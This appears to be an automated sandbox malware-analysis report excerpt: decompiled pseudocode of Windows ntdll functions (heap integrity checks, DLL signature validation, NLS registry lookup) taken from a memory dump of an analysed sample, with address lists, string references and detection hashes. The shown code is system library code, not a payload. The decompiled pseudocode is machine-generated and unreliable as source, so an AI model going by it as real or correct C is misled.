                                                                                                            0x010c98fb
                                                                                                            0x010c98fb
                                                                                                            0x010c9907
                                                                                                            0x010c991d
                                                                                                            0x010c991d
                                                                                                            0x010c9907
                                                                                                            0x010c98e3
                                                                                                            0x01077ef0
                                                                                                            0x01077f14
                                                                                                            0x01077f14
                                                                                                            0x01077f1e
                                                                                                            0x010c9946
                                                                                                            0x01077f24
                                                                                                            0x01077f24
                                                                                                            0x01077f24
                                                                                                            0x01077f2c
                                                                                                            0x010c996a
                                                                                                            0x010c9975
                                                                                                            0x010c9975
                                                                                                            0x010c997e
                                                                                                            0x010c9993
                                                                                                            0x010c9993
                                                                                                            0x010c997e
                                                                                                            0x00000000
                                                                                                            0x01077ef2
                                                                                                            0x01077efc
                                                                                                            0x01077f0a
                                                                                                            0x01077f0e
                                                                                                            0x010c9933
                                                                                                            0x00000000
                                                                                                            0x010c9933
                                                                                                            0x00000000
                                                                                                            0x01077f0e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01077eb1

                                                                                                            Strings
                                                                                                            • LdrpCompleteMapModule, xrefs: 010C9898
                                                                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 010C9891
                                                                                                            • minkernel\ntdll\ldrmap.c, xrefs: 010C98A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                            • API String ID: 0-1676968949
                                                                                                            • Opcode ID: e51916ea151827ac62c8f8b0438a2612dcc92545baeebc57ee4d7e5020588d81
                                                                                                            • Instruction ID: 0c351c087825c1d15390a0ac5207ee7e4914816b51c46ed7b122aa75133bf51a
                                                                                                            • Opcode Fuzzy Hash: e51916ea151827ac62c8f8b0438a2612dcc92545baeebc57ee4d7e5020588d81
                                                                                                            • Instruction Fuzzy Hash: DE510171A00742DBEB22CB6CC948B6A7BE4FB08754F1409A9E9D19B3E1D734ED00CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 011123E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E011123E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x115874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x115874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E010BD4F0(_t83, 0x1046c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0106B150();
					} else {
						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E0106B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1156378 = 1;
						asm("int3");
						 *0x1156378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                                                                            0x011123e3
                                                                                                            0x011123e8
                                                                                                            0x011123eb
                                                                                                            0x011123ee
                                                                                                            0x011123f3
                                                                                                            0x0111259b
                                                                                                            0x0111259b
                                                                                                            0x0111259d
                                                                                                            0x011125a3
                                                                                                            0x011125a3
                                                                                                            0x011123fb
                                                                                                            0x01112424
                                                                                                            0x0111244f
                                                                                                            0x01112460
                                                                                                            0x01112451
                                                                                                            0x01112451
                                                                                                            0x01112456
                                                                                                            0x01112458
                                                                                                            0x01112458
                                                                                                            0x0111245b
                                                                                                            0x0111245b
                                                                                                            0x01112426
                                                                                                            0x01112431
                                                                                                            0x01112436
                                                                                                            0x01112443
                                                                                                            0x01112438
                                                                                                            0x01112438
                                                                                                            0x01112438
                                                                                                            0x01112445
                                                                                                            0x01112445
                                                                                                            0x01112463
                                                                                                            0x01112469
                                                                                                            0x0111246f
                                                                                                            0x01112480
                                                                                                            0x01112495
                                                                                                            0x011124a1
                                                                                                            0x011124ce
                                                                                                            0x011124df
                                                                                                            0x011124d0
                                                                                                            0x011124d0
                                                                                                            0x011124d5
                                                                                                            0x011124d7
                                                                                                            0x011124d7
                                                                                                            0x011124da
                                                                                                            0x011124da
                                                                                                            0x011124a3
                                                                                                            0x011124b0
                                                                                                            0x011124b5
                                                                                                            0x011124c2
                                                                                                            0x011124b7
                                                                                                            0x011124b7
                                                                                                            0x011124b7
                                                                                                            0x011124c4
                                                                                                            0x011124c4
                                                                                                            0x011124e8
                                                                                                            0x01112497
                                                                                                            0x0111249a
                                                                                                            0x0111249a
                                                                                                            0x01112482
                                                                                                            0x01112488
                                                                                                            0x01112488
                                                                                                            0x01112471
                                                                                                            0x01112479
                                                                                                            0x01112479
                                                                                                            0x011124ef
                                                                                                            0x011123fd
                                                                                                            0x01112401
                                                                                                            0x01112412
                                                                                                            0x01112403
                                                                                                            0x01112403
                                                                                                            0x01112408
                                                                                                            0x0111240a
                                                                                                            0x0111240a
                                                                                                            0x0111240d
                                                                                                            0x0111240d
                                                                                                            0x0111241b
                                                                                                            0x0111241b
                                                                                                            0x011124f1
                                                                                                            0x011124f6
                                                                                                            0x01112507
                                                                                                            0x01112510
                                                                                                            0x00000000
                                                                                                            0x01112510
                                                                                                            0x0111250b
                                                                                                            0x00000000
                                                                                                            0x011124f8
                                                                                                            0x011124f8
                                                                                                            0x011124fc
                                                                                                            0x01112500
                                                                                                            0x01112512
                                                                                                            0x01112515
                                                                                                            0x0111251a
                                                                                                            0x01112521
                                                                                                            0x01112524
                                                                                                            0x01112529
                                                                                                            0x0111252f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0111253c
                                                                                                            0x0111255c
                                                                                                            0x01112561
                                                                                                            0x0111253e
                                                                                                            0x01112554
                                                                                                            0x01112559
                                                                                                            0x0111256a
                                                                                                            0x0111256d
                                                                                                            0x01112574
                                                                                                            0x01112586
                                                                                                            0x01112588
                                                                                                            0x0111258f
                                                                                                            0x01112590
                                                                                                            0x01112590
                                                                                                            0x01112597
                                                                                                            0x00000000
                                                                                                            0x01112597

                                                                                                            Strings
                                                                                                            • HEAP: , xrefs: 0111255C
                                                                                                            • HEAP[%wZ]: , xrefs: 0111254F
                                                                                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0111256F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                            • API String ID: 0-3815128232
                                                                                                            • Opcode ID: f7705b66387cfa3b82a439db16aa86e177437f05979dc0216ac0e9292739059f
                                                                                                            • Instruction ID: d1cc9bc32c57acc662390a7026f2ccad341f7b5d784e34f792301546b029de3b
                                                                                                            • Opcode Fuzzy Hash: f7705b66387cfa3b82a439db16aa86e177437f05979dc0216ac0e9292739059f
                                                                                                            • Instruction Fuzzy Hash: D3512874240260CAE77CCE1EC8847B2FBF1DB45644F754879E9C68BA89E339D842DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0106E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E0106E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0106F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E010A95D0();
						}
						if(_t78 != 0) {
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E010AFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E010ABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E010A9600();
					if(_t97 < 0) {
						goto L6;
					}
					E010ABB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0106F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E010ABB40(_t83, _t102 + 0x24, _t78);
								if(L010743C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E010ABB40(_t84, _t102 + 0x24, _t94);
									if(L010743C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                            0x0106e620
                                                                                                            0x0106e628
                                                                                                            0x0106e62f
                                                                                                            0x0106e631
                                                                                                            0x0106e635
                                                                                                            0x0106e637
                                                                                                            0x0106e63e
                                                                                                            0x010c5503
                                                                                                            0x010c5503
                                                                                                            0x0106e64c
                                                                                                            0x0106e64c
                                                                                                            0x0106e651
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0106e661
                                                                                                            0x0106e665
                                                                                                            0x010c542a
                                                                                                            0x0106e715
                                                                                                            0x0106e71a
                                                                                                            0x0106e71c
                                                                                                            0x0106e720
                                                                                                            0x0106e720
                                                                                                            0x0106e727
                                                                                                            0x0106e736
                                                                                                            0x0106e736
                                                                                                            0x0106e743
                                                                                                            0x0106e743
                                                                                                            0x0106e673
                                                                                                            0x0106e678
                                                                                                            0x0106e67d
                                                                                                            0x0106e682
                                                                                                            0x0106e685
                                                                                                            0x0106e692
                                                                                                            0x0106e69b
                                                                                                            0x0106e6a3
                                                                                                            0x0106e6ad
                                                                                                            0x0106e6b1
                                                                                                            0x0106e6b2
                                                                                                            0x0106e6bb
                                                                                                            0x0106e6bf
                                                                                                            0x0106e6c0
                                                                                                            0x0106e6c8
                                                                                                            0x0106e6cc
                                                                                                            0x0106e6d5
                                                                                                            0x0106e6d9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0106e6e5
                                                                                                            0x0106e6ea
                                                                                                            0x0106e6f9
                                                                                                            0x0106e70b
                                                                                                            0x0106e70f
                                                                                                            0x010c5439
                                                                                                            0x010c545e
                                                                                                            0x010c545e
                                                                                                            0x00000000
                                                                                                            0x010c545e
                                                                                                            0x010c543b
                                                                                                            0x010c543e
                                                                                                            0x010c5440
                                                                                                            0x010c5445
                                                                                                            0x010c5472
                                                                                                            0x010c5475
                                                                                                            0x010c548d
                                                                                                            0x010c5493
                                                                                                            0x010c54a9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c54ab
                                                                                                            0x010c54b4
                                                                                                            0x010c54bc
                                                                                                            0x010c54c8
                                                                                                            0x010c54de
                                                                                                            0x010c54fb
                                                                                                            0x010c54e0
                                                                                                            0x010c54e6
                                                                                                            0x010c54eb
                                                                                                            0x010c54eb
                                                                                                            0x010c54de
                                                                                                            0x00000000
                                                                                                            0x010c54bc
                                                                                                            0x010c5477
                                                                                                            0x010c547a
                                                                                                            0x010c5480
                                                                                                            0x010c5483
                                                                                                            0x010c5486
                                                                                                            0x010c548b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c548b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c5447
                                                                                                            0x010c5447
                                                                                                            0x010c5447
                                                                                                            0x010c5447
                                                                                                            0x010c544e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c5450
                                                                                                            0x010c5452
                                                                                                            0x010c5455
                                                                                                            0x010c545a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c545c
                                                                                                            0x010c546a
                                                                                                            0x010c546d
                                                                                                            0x010c546f
                                                                                                            0x00000000
                                                                                                            0x010c546f
                                                                                                            0x0106e70f

                                                                                                            Strings
                                                                                                            • InstallLanguageFallback, xrefs: 0106E6DB
                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0106E68C
                                                                                                            • @, xrefs: 0106E6C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                            • API String ID: 0-1757540487
                                                                                                            • Opcode ID: 9521f162ab476d1e5eaa6327fd07998f00ee3960992586c1cbfac692bcd05805
                                                                                                            • Instruction ID: a503948c9e76c59c53b557d8cebc2ba8ef168f74ee91b16e699e65b4ec88dd97
                                                                                                            • Opcode Fuzzy Hash: 9521f162ab476d1e5eaa6327fd07998f00ee3960992586c1cbfac692bcd05805
                                                                                                            • Instruction Fuzzy Hash: 7751B4796083069BD710DF68C880AAFB7E8BF98614F45096EF9C5D7240FB34D904CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108B8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 60%
                                                                                                            			E0108B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x1158748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E0106B150();
						} else {
							E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E0106B150();
						__eflags =  *0x1157bc8;
						if(__eflags == 0) {
							E01122073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0108AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                                                            0x0108b8f0
                                                                                                            0x0108b8f2
                                                                                                            0x0108b8f4
                                                                                                            0x010d2c4e
                                                                                                            0x010d2c50
                                                                                                            0x010d2c56
                                                                                                            0x010d2c5c
                                                                                                            0x010d2c60
                                                                                                            0x010d2c7f
                                                                                                            0x010d2c84
                                                                                                            0x010d2c62
                                                                                                            0x010d2c77
                                                                                                            0x010d2c7c
                                                                                                            0x010d2c8a
                                                                                                            0x010d2c8f
                                                                                                            0x010d2c94
                                                                                                            0x010d2c9c
                                                                                                            0x010d2ca5
                                                                                                            0x010d2ca5
                                                                                                            0x010d2c9c
                                                                                                            0x010d2c50
                                                                                                            0x0108b8fa
                                                                                                            0x0108b902
                                                                                                            0x0108b921
                                                                                                            0x0108b921
                                                                                                            0x0108b924
                                                                                                            0x0108b924
                                                                                                            0x0108b927
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108b929
                                                                                                            0x0108b92b
                                                                                                            0x0108b92d
                                                                                                            0x0108b940
                                                                                                            0x00000000
                                                                                                            0x0108b940
                                                                                                            0x0108b932
                                                                                                            0x0108b932
                                                                                                            0x00000000
                                                                                                            0x0108b932
                                                                                                            0x00000000
                                                                                                            0x0108b904
                                                                                                            0x0108b904
                                                                                                            0x0108b90a
                                                                                                            0x0108b90c
                                                                                                            0x0108b916
                                                                                                            0x0108b919
                                                                                                            0x0108b915
                                                                                                            0x0108b915
                                                                                                            0x0108b91b
                                                                                                            0x0108b91b
                                                                                                            0x00000000
                                                                                                            0x0108b910

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                            • API String ID: 0-2558761708
                                                                                                            • Opcode ID: bb7be35fbb889ef4606bedd10263a3e53ed66c89c9d5580206f489b07a2a69f2
                                                                                                            • Instruction ID: 591804e29600bf3049a08d7f5aa79786c11302488907be9e917cb5f1129616cd
                                                                                                            • Opcode Fuzzy Hash: bb7be35fbb889ef4606bedd10263a3e53ed66c89c9d5580206f489b07a2a69f2
                                                                                                            • Instruction Fuzzy Hash: 4D11DD71318602DFD769EA1AC484B7AB7A5EB80624F1880A9E0CACF351EA34D881CB45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0112E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 60%
                                                                                                            			E0112E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0112BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0112BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0112AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E010A9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0112A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0112A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E010A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0112A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0112A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01082280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0107B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0107FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01087D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0111FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                            0x0112e547
                                                                                                            0x0112e549
                                                                                                            0x0112e54f
                                                                                                            0x0112e553
                                                                                                            0x0112e557
                                                                                                            0x0112e55a
                                                                                                            0x0112e55c
                                                                                                            0x0112e55f
                                                                                                            0x0112e561
                                                                                                            0x0112e567
                                                                                                            0x0112e56b
                                                                                                            0x0112e7e2
                                                                                                            0x00000000
                                                                                                            0x0112e571
                                                                                                            0x0112e575
                                                                                                            0x0112e577
                                                                                                            0x0112e57b
                                                                                                            0x0112e57c
                                                                                                            0x0112e57d
                                                                                                            0x0112e57e
                                                                                                            0x0112e57f
                                                                                                            0x0112e588
                                                                                                            0x0112e58f
                                                                                                            0x0112e591
                                                                                                            0x0112e592
                                                                                                            0x0112e592
